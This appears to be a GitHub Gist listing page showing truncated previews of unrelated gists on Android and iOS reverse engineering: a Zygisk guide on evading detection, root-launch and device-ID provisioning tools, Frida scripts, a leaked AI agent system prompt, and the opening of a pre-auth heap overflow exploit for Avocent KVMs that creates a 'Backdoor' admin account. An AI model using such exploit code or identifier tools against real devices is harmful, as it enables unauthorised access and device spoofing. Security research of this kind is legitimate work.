ApkUnpacker apkunpacker

@ThePedroo
ThePedroo / THEPEDROO_ZYGISK_MODULE_GUIDE.md
Created March 29, 2026 06:29
ThePedroo's Zygisk Module Guide

ThePedroo's Zygisk Module Guide

The Zygisk API is fairly easy to understand: two main functions, and 4 functions that are set at runtime, pre and post for both apps and system server. However, as you get deeper into developing a Zygisk module, it gets significantly harder to know how to improve the module's efficiency and how to avoid detections; after all, there are no (properly) documented resources for either.

This post/guide, written by ReZygisk's developer, documents a good deal of (actually valuable) information that helps build a better Zygisk module, improving hiding and performance/speed.

1. Untargeted processes; Minimal execution

Many Zygisk modules have specific targets and aren't meant to execute in other processes. It is also common for many to need to execute a considerable amount of code to prepare for later execution. However, it is important to check, as the first real step in preAppSpecialize, whether you actually need to run any code in that process.

/*
* shizuku_starter.c
*
* Starts Shizuku server with root privileges.
* Intended to be executed via Xiaomi IMQSNative service.
*
*
* Compile (Termux):
* clang -O2 -Wall -o /data/local/tmp/shizuku_starter shizuku_starter.c
*
@MhmRdd
MhmRdd / provision_device_ids.c
Created March 1, 2026 02:28
Standalone Device ID provisioning utility for Qualcomm Keymaster
/*
* provision_device_ids.c
* Copyright (c) 2026 mhmrdd. All rights reserved.
*
* Standalone Device ID provisioning utility for Qualcomm Keymaster.
*
* This tool provisions Android attestation identifiers (brand, device,
* product, serial, IMEI/MEID, manufacturer, model) into secure storage
* through QSEECom and finalizes Device ID provisioning state.
*
@jlia0
jlia0 / agent loop
Last active May 7, 2026 14:27
Manus tools and prompts
You are Manus, an AI agent created by the Manus team.
You excel at the following tasks:
1. Information gathering, fact-checking, and documentation
2. Data processing, analysis, and visualization
3. Writing multi-chapter articles and in-depth research reports
4. Creating websites, applications, and tools
5. Using programming to solve various problems beyond development
6. Various tasks that can be accomplished using computers and the internet
@Ahmeth4n
Ahmeth4n / pairip_analysis.js
Created March 2, 2025 20:44
simple PairIP executeVM() analyzer frida script.
function hookNative() {
const jniOnLoad = moduleHandle.findExportByName("JNI_OnLoad");
if (!jniOnLoad) {
console.log("[-] JNI_OnLoad not found!");
return;
}
console.log("[+] JNI_OnLoad founded:", jniOnLoad);
@miticollo
miticollo / build_frida.sh
Last active April 28, 2026 03:24
How to build frida-server (≥ 16.2.2) for iOS jailbroken devices
#!/usr/bin/env bash
#
# Build Frida DEB.
# register the cleanup function to be called on the EXIT signal
trap cleanup INT
#######################################
# Deletes the temp directory.
# Globals:
@aemmitt-ns
aemmitt-ns / asmpwn.py
Last active December 30, 2023 15:08
Remote pre-auth heap buffer overflow exploit for Avocent KVMs
import socket, struct, sys
p32 = lambda x: struct.pack(">I", x)
p16 = lambda x: struct.pack(">h", x)
p8 = lambda x: struct.pack(">b", x)
# ASMP heap overflow exploit creates new applianceAdmin user
def exploit(hostname, username="Backdoor", password="Backdoor"):
global socks # python closes out of scope sockets
port = 3211 # port is hardcoded in the binary
usernm = username.encode()
@jevinskie
jevinskie / example.txt
Created July 14, 2023 02:34
xnu-unsuspend
jevin@wombat [22:32:18] [~/code/mac/widget/xnu_unsuspend] [main *]
-> % sudo taskinfo 'Deliveries Widget'
process: "Deliveries Widget" [30145] [unique ID: 1220404]
architecture: arm64
coalition (type 0) ID: 105936
coalition (type 1) ID: 591
suspend count: 1
virtual bytes: 389.40 GB; phys_footprint bytes: 8.92 MB; phys_footprint lifetime maximum bytes: 8.92 MB
run time: 42 s
user/system time (current threads): 0.046565 s / 0.036279 s
@aemmitt-ns
aemmitt-ns / restricted.m
Created May 19, 2023 14:06
program to dump out forbidden classes and selectors in NSPredicates
// dump classes and selectors forbidden in NSPredicates
// `cc -framework Foundation -o restricted restricted.m`
#import <Foundation/Foundation.h>
#import <dlfcn.h>
int main() {
void *cf = dlopen("/System/Library/Frameworks/CoreFoundation.framework/CoreFoundation", 0);
NSDictionary* (*RestrictedClasses)() = dlsym(cf, "_CFPredicatePolicyRestrictedClasses");
NSDictionary* (*RestrictedSelectors)() = dlsym(cf, "_CFPredicatePolicyRestrictedSelectors");
NSLog(@"Restricted Selectors: %@", RestrictedSelectors());
@miticollo
miticollo / permissions.py
Created May 9, 2023 01:07
A frida agent to reset all permissions on specific app. This work is based on https://github.com/FouadRaheb/AppData.
#!/usr/bin/env python3
import json
import frida
from frida.core import Device, Session, Script, ScriptExportsSync
compiler: frida.Compiler = frida.Compiler()
compiler.on("diagnostics", lambda diag: print(f"on_diagnostics: {diag}"))
bundle: str = compiler.build('permissions.ts', compression='terser')